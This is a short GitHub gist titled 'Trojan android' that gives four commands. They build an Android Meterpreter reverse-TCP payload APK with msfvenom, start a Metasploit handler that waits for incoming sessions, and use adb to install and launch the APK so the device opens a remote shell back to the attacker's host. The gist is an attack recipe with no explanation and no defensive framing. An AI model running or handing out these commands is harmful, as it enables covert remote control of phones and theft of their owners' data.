Skip to content

Instantly share code, notes, and snippets.

@castexyz
Created November 14, 2019 14:21
Show Gist options
  • Save castexyz/8643dc5ce74180df27695b61c5a78c25 to your computer and use it in GitHub Desktop.
Save castexyz/8643dc5ce74180df27695b61c5a78c25 to your computer and use it in GitHub Desktop.
Trojan android
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.6 LPORT=4444 -o msf.apk
msfconsole -qx "use exploit/multi/handler; set PAYLOAD android/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set ExitOnSession false; exploit -j -z"
adb install msf.apk
adb shell am start -n com.metasploit.stage/.MainActivity
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment